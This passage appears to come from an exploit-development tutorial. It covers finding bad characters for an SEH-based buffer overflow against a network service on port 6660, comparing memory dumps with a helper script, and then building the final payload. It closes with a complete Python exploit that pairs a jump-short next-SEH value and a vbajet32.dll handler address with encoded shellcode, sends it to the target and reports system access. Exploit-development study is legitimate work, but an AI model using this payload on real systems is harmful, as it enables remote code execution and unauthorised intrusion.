- Bad Character
Run the script generatecodes.pl,
then copy its output into the fuzzer, one line at a time.
After that, run the fuzzer again and look at the SEH chain. If it succeeds, the SEH chain will lead into vbajet32.dll.
Then copy the second line into the fuzzer script like this:
So we know the bad character is in the second line. Then split it into two parts:
\x12\x13\x14\x15\x16\x17\x18\x19\x1a and \x1b\x1c\x1d\x1e\x1f\x20
First, run the fuzzer without the second part.
We can see in the SEH chain that the SEH leads into vbajet32.dll, so we know the bad character is in the second part. Then divide it into two parts again: \x1b\x1c\x1d and \x1e\x1f\x20
Run it again without the second part, and the SEH again leads into vbajet32.dll, so we know the bad character is among \x1e, \x1f, and \x20. Then try running without \x20; the SEH leads into vbajet32.dll again, so the bad character is \x20.
Then use generatecodes.pl again,
copy the output into the fuzzer, and run it again.
Now we can see the SEH leads into vbajet32.dll.
- Next step: we have to check for bad characters inside the buffer
To find them, run the fuzzer and then press Shift + F9.
The next step is to read the buffer inside memory:
right click --> Follow in Dump --> Selection
Then we can see that the dummy shellcode has been written into memory.
Select the data from 01 to ff, then right click --> Binary --> Binary copy
and paste it into an editor. Here I paste it and save it as memory.txt.
After that, save the dummy shellcode into the file shellcode.txt.
Then compare the two files (memory.txt and shellcode.txt) using comparememory.pl.
We can see that the characters \x25, \x26, \x27 are lost in memory and replaced by the single character \x57.
So try removing character \x25 from the list used to generate the dummy shellcode:
root@bt:~# perl generatecodes.pl 00,0a,0d,20,25
Then repeat the steps from checking bad characters up to the comparison of memory.txt and shellcode.txt.
If it succeeds, the comparison will no longer show the result it did previously.
So from here we know that \x25 is a bad character too. Now we have 5 bad characters (\x00, \x0a, \x0d, \x20, and \x25).
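The comparison step above (dummy pattern sent by the fuzzer versus the bytes copied out of the memory dump) is what comparememory.pl does in the post. The script below is an added example, not the post's own Perl tools: generate_codes builds the same \x01..\xff pattern minus an exclusion list (an assumption about what generatecodes.pl outputs), and compare_memory walks the two byte strings in step, reporting which bytes were mangled or dropped. Because a mangled byte shifts everything after it (the post saw \x25\x26\x27 collapse into one \x57), the comparison realigns the two streams after each mismatch instead of flagging every following byte. The memory dump is simulated with constructed data so the script runs offline.

```python
#!/usr/bin/env python3
"""Added example (not the original post's comparememory.pl / generatecodes.pl):
compare the byte pattern that was sent with the bytes read back from the
process memory dump, and report which bytes did not survive.  All sample
data below is constructed."""


def generate_codes(exclude):
    """Return the test pattern \\x01..\\xff with the bytes in `exclude` removed,
    assumed to be equivalent to what the post's generatecodes.pl produces."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def compare_memory(sent, dumped, window=8):
    """Walk `sent` (what the fuzzer wrote, i.e. shellcode.txt) and `dumped`
    (the debugger's binary copy of memory, i.e. memory.txt) in step.

    Returns (bad, lost_at):
      bad     - list of byte values from `sent` that were mangled or dropped
      lost_at - offset into `sent` where the dump ended early or where the
                two streams could no longer be realigned, or None
    After a mismatch we look ahead up to `window` bytes on both sides to
    find where the streams line up again; every sent byte skipped over in
    that search is reported as bad.
    """
    bad = []
    i = j = 0
    while i < len(sent) and j < len(dumped):
        if sent[i] == dumped[j]:
            i += 1
            j += 1
            continue
        resync = None
        for di in range(i, min(i + window, len(sent))):
            for dj in range(j, min(j + window, len(dumped))):
                if sent[di] == dumped[dj]:
                    resync = (di, dj)
                    break
            if resync is not None:
                break
        if resync is None:
            return bad, i          # alignment lost; remaining bytes unknown
        di, dj = resync
        bad.extend(sent[i:di])     # the bytes that never made it into memory
        i, j = di, dj
    lost_at = i if i < len(sent) else None
    return bad, lost_at


def simulate_dump(sent):
    """Constructed stand-in for the memory dump: the target replaces the
    run \\x25\\x26\\x27 with a single \\x57, as the post observed."""
    return sent.replace(b"\x25\x26\x27", b"\x57")


if __name__ == "__main__":
    known_bad = {0x00, 0x0a, 0x0d, 0x20}
    sent = generate_codes(known_bad)          # shellcode.txt equivalent
    dumped = simulate_dump(sent)              # memory.txt equivalent
    bad, lost_at = compare_memory(sent, dumped)
    print("bad bytes:", ["\\x%02x" % b for b in bad], "lost_at:", lost_at)
    # Next round: add \x25 to the exclusion list and compare again;
    # \x26 and \x27 now survive, so the comparison comes back clean.
    sent2 = generate_codes(known_bad | {0x25})
    print(compare_memory(sent2, simulate_dump(sent2)))
```

The second element of the result distinguishes a byte that was substituted (reported in the bad list) from a byte that terminated the copy early, which is how \x00, \x0a or \x0d typically show up: the dump simply stops, and lost_at gives the offset of the last byte that reached memory.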
Next, generate the shellcode again (excluding those 5 bad characters),
then copy the payload into the fuzzer and run it again:
#!/usr/bin/python
# Python 2 script: str is a byte string, so the buffer can be sent as-is.
import socket
target_address="192.168.56.101"
target_port=6660
buffer="USV "
buffer+="\x90" * 962                    # padding up to the SEH record
buffer+="\xeb\x06\x90\x90" # JMP SHORT 6 (next SEH pointer)
buffer+="\x6A\x19\x9A\x0F" # SEH handler: address inside vbajet32.dll
buffer+="\x90" * 16                     # NOP sled into the shellcode
# shellcode generated without the bad characters \x00 \x0a \x0d \x20 \x25
buffer+=("\xda\xc2\xb8\xf0\x80\x7a\x64\x29\xc9\xd9\x74\x24\xf4\xb1\x51\x5f"
"\x31\x47\x17\x83\xc7\x04\x03\xb7\x93\x98\x91\xcb\xfe\xb7\x17\xdb"
"\x06\xb8\x57\xe4\x99\xcc\xc4\x3e\x7e\x58\x51\x02\xf5\x22\x5f\x02"
"\x08\x34\xd4\xbd\x12\x41\xb4\x61\x22\xbe\x02\xea\x10\xcb\x94\x02"
"\x69\x0b\x0f\x76\x0e\x4b\x44\x81\xce\x86\xa8\x8c\x12\xfd\x47\xb5"
"\xc6\x26\x80\xbc\x03\xad\x8f\x1a\xcd\x59\x49\xe9\xc1\xd6\x1d\xb2"
"\xc5\xe9\xca\x4f\xda\x62\x85\x23\x06\x69\xf7\x78\x77\x4a\x93\xf5"
"\x3b\x5c\xd7\x49\xb0\x17\x97\x55\x65\xac\x18\x6d\x2b\xdb\x16\x23"
"\xdd\xf7\x77\x44\x37\x61\x2b\xdc\xd0\x5d\xf9\x48\x56\xd1\xcf\xd7"
"\xcc\xea\xe0\x8f\x27\xf9\xfd\x74\xe8\xfd\x28\xd5\x81\xe7\xb3\x68"
"\x7c\xef\x39\x3f\x15\xf2\xc2\x6f\x81\x2b\x35\x7a\xff\x9b\xb9\x52"
"\x53\x77\x15\x09\x07\x34\xca\xee\xf4\x45\x3c\x96\x92\xa8\xe1\x30"
"\x30\x42\xf8\x29\xde\xf0\xe1\x21\xd8\xae\xea\x17\x8c\x40\x44\xc2"
"\xae\xb1\x0e\x48\xfd\x1c\x26\xc7\x01\xb6\xeb\xb2\x02\xe7\x64\xd9"
"\xb4\x8e\x3c\x76\xb8\x59\xee\x2c\x12\x33\xf0\x1c\x09\xd3\xe9\xe5"
"\xe8\x5d\xa1\xea\x23\xc8\xb2\xc4\xaa\x99\x28\x82\x5a\x3d\xdc\xc3"
"\x7e\xab\x4e\x8a\xa9\xe0\xe6\xcb\xc0\xbc\x71\xf1\x24\xfd\x71\x5f"
"\xb8\xbf\x58\x61\x07\x6c\x30\x10\xf2\x54\x9d\x81\xa8\xcd\x93\x2b"
"\x1d\x1b\xab\xa6\x26\xdb\x85\x13\xf0\x71\x7b\xf2\xaf\x1f\x7a\xa5"
"\x1e\xb5\x2d\xba\x71\x5d\x63\x9d\x77\x50\x28\xe2\xae\x06\x30\xe3"
"\x78\x28\x1e\x90\xd0\x2a\x1c\x62\xba\x2d\xf5\x38\xbc\x02\x92\xc2"
"\x9a\x41\x10\x69\xe4\x50\x28\x5d")
buffer+="\x90" * (2504-len(buffer))     # pad the request to a fixed 2504 bytes
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address,target_port))
sock.send(buffer)
print("kirim")
sock.close()
Now we can access the system.
Alhamdulillah .... :D